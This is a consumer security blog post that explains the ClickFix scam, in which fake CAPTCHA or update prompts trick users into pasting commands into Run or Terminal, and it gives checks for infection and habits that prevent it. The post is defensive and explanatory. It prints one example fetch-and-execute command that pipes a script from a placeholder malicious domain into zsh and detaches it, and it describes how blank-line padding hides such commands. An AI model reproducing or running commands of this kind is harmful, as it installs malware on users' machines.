What Is the ClickFix Scam? The Fake CAPTCHA That Almost Got My Laptop

ClickFix tricks you into pasting a hidden command into Run or Terminal. Here's exactly how it works, what the command actually does, and how to check if you've been hit.

Published July 9, 2026

Quick Answer

What is the ClickFix scam?

ClickFix is a social engineering attack where a fake CAPTCHA, error message, or verification page tricks you into copying a command and pasting it into Windows Run, PowerShell, or a terminal. If you submit it, the command can download and run malware without a normal file download.

Premium GuardPick hero showing a generic fake verification prompt, terminal risk card, and teal shield on a laptop

Quick Take

  • ClickFix is a fake CAPTCHA or error page that talks you into copying a command and pasting it into Windows Run or a terminal
  • The command usually pipes a script straight from a website into your shell, with no file download and no antivirus prompt
  • Blank lines and a fake “Press Enter to continue” message are there to hide the real command from view
  • Pasting alone does nothing. The danger starts the moment you hit Enter
  • Check your shell history or Run dialog history to confirm whether a suspicious command actually executed

GuardPick snapshot

The short version

ClickFix is dangerous because it turns the user into the installer. The fake page does not need a normal download if it can convince you to paste and submit the command yourself.

Best for

Readers who saw a fake CAPTCHA, browser error, or verification screen asking them to paste a command.

Avoid if

You are looking for full incident response after a confirmed infection. This article explains the pattern and first checks, not deep forensic cleanup.

Main tradeoff

The strongest prevention is behavioral: no website gets permission to tell you what to type into Run, PowerShell, or Terminal.

Safer alternative

Close the page, save the command text if you need to inspect it, and check it before pressing Enter.

Experience note: Based on a command I was actually sent and analyzed myself, on my own machine.

I build websites for a living. I have spent years telling clients not to click the wrong link. So it stung a little when I nearly did something dumber: I pasted a command straight into my own terminal because a message made it look routine.

It came as a single line of text, base64-encoded, followed by a wall of blank space and a message that just said “Press Return to continue.” No file attached. No warning from my browser. Just text I was told to run. I hit Ctrl+V. I did not hit Enter, mostly out of habit and not caution. That pause is the only reason this article isn’t about cleaning up my own laptop.

ClickFix is the name security researchers gave to this exact pattern: a fake verification screen, a fake error message, or a fake “your download failed, click here to fix it” popup that ends with the same instruction: copy this, paste it into Run or Terminal, press Enter. It has been circulating widely enough on both Windows and Mac that treating it as a one-off is a mistake. If you want the bigger pattern behind the tactic, I break that down separately in why ClickFix scams are working so well right now.

Fake update fix required prompt telling a user to open Terminal and paste a command

The fake update prompt I was shown used familiar macOS keyboard shortcuts to make a Terminal command feel like a normal troubleshooting step.

What the Command Actually Does

Decoded, the line I was sent read approximately like this:

curl -ksfL https://[malicious-domain]/[random-path] | zsh & disown

Every flag in that line earns its place. -k skips SSL certificate verification, so the connection can’t be blocked just because the destination looks untrustworthy to your system. -s keeps curl quiet, -f fails silently on some server errors, and -L follows redirects without stopping to explain where the request is going. The pipe into zsh (or bash, powershell, cmd, same pattern, different shell depending on the operating system) runs whatever comes back from that URL immediately, as a script, with no file ever touching your Downloads folder. & disown detaches the process from the terminal so it keeps running in the background even after you close the window, and it won’t show up in the obvious places you’d think to look.

Nothing here requires you to install anything. The command uses tools your operating system already trusts. That is the entire point.

Myth check

The mental trap behind ClickFix

ClickFix works because the dangerous part looks like a normal troubleshooting step. These are the assumptions to reset before you touch the keyboard.

Myth

If there is no download, nothing can install.

Reality

A pasted command can fetch and run code directly from a remote URL without leaving a normal installer in Downloads.

GuardPick take

No file download does not mean no risk.

Treat any website-provided command as executable code, not as harmless text.

Myth

A CAPTCHA can ask for extra verification steps.

Reality

Real CAPTCHA checks happen inside the browser. They do not need Windows Run, PowerShell, or Terminal.

GuardPick take

The moment a verification page asks for a system prompt, the page has left normal CAPTCHA territory.

Close the tab and verify the site from a fresh browser session.

Myth

Antivirus will stop it if it is bad.

Reality

Security software may block a known malicious URL or behavior, but it cannot make a pasted command a safe habit.

GuardPick take

Use antivirus as one layer, not as permission to run unknown commands.

Read, decode, and check the destination before executing anything.

Why the Blank Lines and Fake Prompt Matter

The version I received padded the real command with roughly thirty blank lines and ended with a centered message reading “Press Return to continue.” If you paste that whole block into a terminal and glance at the result, your eye lands on the harmless-looking line at the bottom. The command that actually matters has already scrolled off the top of the visible window.

My Experience:

When I ran the decoded text past a second pair of eyes, the layout became obvious for what it was: theater. A real system message doesn’t need thirty blank lines and a centered prompt to ask you to press a key. That formatting only makes sense if the goal is to push something else out of view first.

How to Check If It Actually Ran

Pasting text into Run, PowerShell, or a terminal doesn’t execute it by itself. The command sits in the input field until you press Enter. If you’re not sure whether you went that far, here’s where to look before assuming the worst:

On Windows: open Task Manager and check the Startup apps tab for anything unfamiliar, review Task Scheduler for new tasks you didn’t create, and check your PowerShell history with Get-History or by searching (Get-PSReadlineOption).HistorySavePath. Also check Windows Security’s protection history for anything it may have already blocked.

On Mac: run launchctl list | grep -v com.apple to see non-Apple background processes, check ~/Library/LaunchAgents and /Library/LaunchDaemons for unfamiliar .plist files, and search ~/.zsh_history for the command itself. If shell history was enabled, it usually shows up there after you submit it.

In my case, the search came back with nothing but the diagnostic commands I typed while checking. The original line never appeared. Combined with no new startup items, no suspicious background process, and no new downloaded installer, that was enough to treat this specific command as not executed or not persisted.

How to Avoid This Going Forward

The fix isn’t a piece of software. It’s a rule: a website should never be able to tell you what to type into Run, PowerShell, or Terminal. Legitimate software updates, browser fixes, and verification steps do not require you to paste anything into a system prompt. If a page asks you to do that, close the tab.

If you do get caught off guard and paste something before thinking it through, don’t press Enter until you’ve read it, or asked someone who can, line by line. I wrote the exact pre-flight process here: how to check if a command is safe before running it. If the prompt was on Windows Run, also check Run dialog history so you can tell the difference between “I pasted it” and “I actually submitted it.” And if you’re not confident your Windows PC would show obvious warning signs from something like this, use the virus symptom checklist next.

Windows Defender, built into current Windows versions, includes SmartScreen protections that can catch some malicious or phishing URLs before they load. It won’t stop you from pasting the command yourself, but it is a real layer of defense worth knowing you have. If you want a second layer for phishing and malicious site blocking, I cover the trade-offs in the antivirus web protection comparison.

Layered protection

What actually reduces ClickFix risk

ClickFix is not solved by one product. The safer setup is a mix of browser filtering, cautious habits, and boring recovery basics.

  1. Layer 1

    Browser protection

    Block known malicious pages before you see the prompt.

    Keep SmartScreen or your browser's safe-browsing protection enabled.

  2. Layer 2

    Command pause

    Stop the attack at the moment it needs your cooperation.

    Never press Enter on a command from a webpage until you understand it.

  3. Layer 3

    History checks

    Confirm whether you pasted only or actually submitted the command.

    Check shell history, PowerShell history, or RunMRU depending on where it happened.

  4. Layer 4

    Full scan

    Look for follow-up payloads if the command may have run.

    Use Windows Security or your installed antivirus for a full scan, not only a quick scan.

  5. Layer 5

    Account protection

    Limit damage if an infostealer was involved.

    Change important passwords from a clean device and turn on 2FA.

  6. Layer 6

    Backup

    Recover if malware damages files or settings.

    Keep cloud or offline backups for important files.

Frequently Asked Questions

What is the ClickFix scam?
ClickFix is a social engineering technique where a fake website prompt, usually disguised as a CAPTCHA, a browser error, or a software update notice, instructs you to copy a command and paste it into the Windows Run dialog, PowerShell, or a Mac terminal. The command can download and run malware, often silently and in the background.
How does ClickFix actually install malware if I don't download anything?
You are the download. The pasted command usually contains a tool already built into your operating system, like curl or PowerShell, which fetches a script from a remote server and executes it immediately. No .exe file lands in your Downloads folder, so it slips past the mental checklist most people use to judge whether something is safe.
I pasted the command but did not press Enter. Am I infected?
Almost certainly not. Pasting text into a Run dialog or terminal only loads it into the input field. Nothing executes until you press Enter or click Run. Check your shell history (Terminal) or the Run dialog's recent list (Windows) to confirm the command was never actually submitted.
How do I check if a ClickFix command actually ran on my computer?
On Windows, check Task Manager's Startup apps tab, Task Scheduler, and your PowerShell history. On Mac, check ~/Library/LaunchAgents, crontab -l, and ~/.zsh_history for the command. If nothing matches and no unfamiliar process or login item shows up, it is less likely that this specific command executed or persisted.
Why do these scam pages show a fake 'Press Enter to continue' message?
It is misdirection. The scam pads the pasted text with blank lines and a harmless-looking instruction so the actual malicious command scrolls out of view. If you paste and glance at the screen, all you see is a generic prompt, not the line that just told your machine to download something.
Does antivirus software stop ClickFix attacks?
Some do, if they include real-time web protection that blocks the malicious download URL before the script runs, or behavior-based detection that flags a browser-triggered shell command. But the strongest defense is still not pasting commands from a website into Run or a terminal in the first place. No security software can undo an action you already told your computer to take.
Steven Doan

Written by

Steven Doan

Web developer. Managed 20+ WordPress sites, dealt with malware firsthand, ran self-managed VPS servers. I review security software the way a developer would — not a lab tester.

Follow me:

Stay in the loop

New security software reviews, deals, and honest takes. No spam.

UI only — backend coming soon.

Related Posts

🛡️ Looking for the best antivirus in 2026?

We tested and ranked the top options — honest picks, real prices.